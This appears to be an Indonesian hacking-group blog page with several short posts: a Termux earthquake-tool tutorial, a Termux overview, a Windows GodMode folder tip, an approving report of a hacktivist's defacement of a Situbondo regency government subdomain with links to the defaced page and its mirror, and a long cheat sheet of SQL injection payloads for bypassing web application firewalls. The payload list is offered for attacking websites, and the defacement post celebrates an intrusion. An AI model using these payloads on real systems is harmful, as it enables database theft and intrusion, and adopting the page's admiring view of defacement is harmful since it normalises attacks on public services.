Halo guys pada kesempatan kali ini kita akan mencoba suatu alat yang bisa mendeteksi gempa terkini. Jika penasaran ikuti tutorialnya di bawah ini :

$ pkg update && pkg upgrade
$ pkg install python2 git
$ git clone https://github.com/suhada99/GempaTerikini.git
$ cd GempaTerikini
$ python2 Gempa-Terkini.py

Itu merupakan tutorial membuka alat pendeteksi gempa menggunakan python2.

Dan hasilnya akan terlihat seperti dibawah ini :

Kalian juga bisa menggunakan php maupun bash.

Tq udah berkunjung ke blog sederhana ini :D

Continue reading

Share:

Berandal :

Untuk orang yang sudah lama dalam dunia underground mungkin sudah tidak asing lagi dengan kodenama Berandal. Dia merupakan Founder dari tim hacker bernama Owl Squad.

Kali ini dia berulah kembali dan subdomain kabupaten situbondo yang menjadi korban nya.
untuk alamat subdomainya kalian bisa lihat di bawah ini :

Link :
http://sipinter.situbondokab.go.id/y.php

Seperti yang terlihat di atas, sepertinya tidak ada pesan khusus yang ingin disampaikan oleh hacker satu ini.

Sedikit info yang saya tau, Berandal dan timnya sering melakukan demo - demo di dunia maya dengan menggunakan tekhnik deface pada suatu website, sesuai slogan tim nya yang bertuliskan Nothing can't stop our march!  jadi yang saya tahu tim ini juga termasuk dalam kategori hacktivist atau aktivis dunia maya bukan hanya sekedar defacer biasa.

untuk mirrornya kalian bisa cek dibawah :

Zone-H :
http://www.zone-h.org/mirror/id/31743108

Sekian berita kali ini, sampai berita ini ditulis subdomain kabupaten situbondo masih dalam keadaan terdeface.

- Madness666

Continue reading

Share:

Termux

Termux merupakan Terminal emulator android dan aplikasi berlingkungan linux  yang bekerja langsung tanpa memerlukan akses rooting atau pengaturan yang diperlukan. Sistem dasar minimal dipasang secara otomatis

> Aman. Akses server jauh menggunakan klien ssh dari OpenSSH. Termux menggabungkan paket standar dengan emulasi terminal akurat dalam solusi open source yang indah. 

> Fitur dikemas. Pilihlah antara Bash, ikan atau Zsh dan nano, Emacs atau Vim. Grep melalui kotak masuk SMS Anda. Akses endpoint API dengan curl dan gunakan rsync untuk menyimpan cadangan daftar kontak Anda di server jauh. 

> Dapat disesuaikan. Instal apa yang Anda inginkan melalui sistem manajemen paket APT yang dikenal dari Debian dan Ubuntu GNU / Linux. Mengapa tidak memulai dengan menginstal Git dan menyinkronkan dotfile Anda?

> Eksplisit. Pernahkah Anda duduk di bus dan bertanya-tanya tar argumen mana yang diterima? Paket yang tersedia di Termux sama dengan yang ada di Mac dan Linux - pasang halaman manual di ponsel Anda dan bacalah dalam satu sesi sambil bereksperimen dengan yang lain.

> Dengan baterai yang disertakan. Dapatkah Anda membayangkan kalkulator saku yang lebih kuat namun elegan daripada konsol Python readline bertenaga? Versi terbaru dari Perl, Python, Ruby, dan Node.js semuanya tersedia.

> Siap untuk ditingkatkan. Sambungkan keyboard Bluetooth dan sambungkan perangkat Anda ke layar eksternal jika Anda perlu - Termux mendukung pintas keyboard dan memiliki dukungan mouse penuh.

> Tinkerable. Kembangkan dengan mengkompilasi file C dengan Clang dan membangun proyek Anda sendiri dengan CMake dan pkg-config. GDB dan strace tersedia jika Anda macet dan perlu melakukan debug.

Note : Termux hanya dapat berjalan pada sistem Android dengan versi 5.0 ke atas

untuk mendownloadnya kalian bisa mendownloadnya melalui Playstore ataupun F-Droid dengan link dibawah ini :

> Playstore (Termux)
> F-Droid (Termux)

Hanya itu yang bisa saya bagikan saat ini terima kasih sudah berkunjung ke blog ini :)

Reference : https://termux.com/

Continue reading

Share:

WAF (Web Application Firewall)

Adalah kepanjangan (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

Rata - rata web yang udah di pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )

untuk itu saya akan sedikit berbagi tentang jenis2 waf yg biasa di gunakan dalam dunia injector :

order by :

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/


union select :

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

information_schema.tables :

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


concat :

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))


group_concat :


/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

Source : http://tutorial-sqli.blogspot.com/2015/07/mcam-macam-bypass-waf.html

Continue reading

Share:

God mode

God mode sebenarnya hanya sebuah folder yang memungkinkan anda untuk mengakses 200 tool atau lebih yang ada di Control panel.

Langkah - langkah :

1.) Kalian buat folder baru di desktop kalian, Klik kanan > New > Folder

2.) Lalu berilah nama folder tersebut GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

God mode, pun selesai dibuat. Jika kalian tidak suka dengan nama God mode atau tidak ingin menamakanya God mode, tinggal kalian namai apa saja bebas.

Kalau Author disini menamakanya "TheGxng" maka namanya akan seperti ini

TheGxng.{ED7BA470-8E54-465E-825C-99712043E01C}

Sekian tutorial kali ini semoga bermanfaat :D

- Madness666

Continue reading

Share:

NAMELESS GXNG

We are Indonesian cyber gang. Kami membagikan post tentang Komputer, programming, hacking, phreaking, dll

Contact :

Fanspage : @namelessgxng
Email      : ndar.cxxlz@gmail.com

# NAMELESS GXNG - NAMELESS GXNG - NAMELESS GXNG - NAMELESS GXNG - NAMELESS GXNG #

Continue reading

Share: